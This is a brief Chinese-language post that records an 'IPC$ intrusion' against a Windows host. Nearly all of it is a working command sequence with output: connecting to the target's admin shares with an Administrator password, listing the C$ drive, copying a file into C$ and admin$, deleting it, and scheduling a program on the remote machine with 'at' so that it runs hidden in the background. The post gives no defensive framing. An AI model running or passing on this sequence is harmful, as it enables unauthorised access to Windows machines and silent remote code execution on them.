网上有很多的IPC$入侵记录,可以自行参考,这里只是一次的过程的记录而已,没有其他额外的内容。
1.建立非空连接
格式:net use \\IP <password> /u:"<Username>"
net use \\192.168.1.121 1qaz2wsx /u:"Administrator"
在域控下:net use \\IP pwd /u:domain\username
2.列一下目录
dir \\192.168.1.121\c$
</pre><pre name="code" class="cpp">显示结果如下:
2015/07/29 12:01 <DIR> 3aaa
2015/06/01 23:23 <DIR> cXXXX
2015/06/07 23:16 <DIR> CloudMusic
2015/03/31 17:19 <DIR> Exam
2009/07/14 11:20 <DIR> PerfLogs
2015/05/16 10:23 <DIR> Program Files
2015/07/29 13:06 <DIR> Program Files (x86)
2015/03/21 15:09 <DIR> Ramble
2015/03/21 18:43 <DIR> Task
2015/07/28 11:49 58 testlog.txt
2015/08/09 09:46 <DIR> Users
2015/08/06 15:38 <DIR> Windows
2015/05/24 00:42 <DIR> ADF
1 个文件 58 字节
12 个目录 7,865,815,040 可用字节
3.查看远程机器的时间
net time \\192.168.1.121
4.拷贝文件到远程机器
copy 123.txt \\192.168.1.121\C$
copy 123.txt \\192.168.1.121\admin$
//admin$所指路径为C:\Windows\system32
5.删除目标文件
del \\192.168.1.121\admin$\123.txt
6.执行某个程序(无交互)
at \\192.168.1.121 10:36 \\192.168.1.121\C$\mspaint.exe //即在后台运行,不会显示出来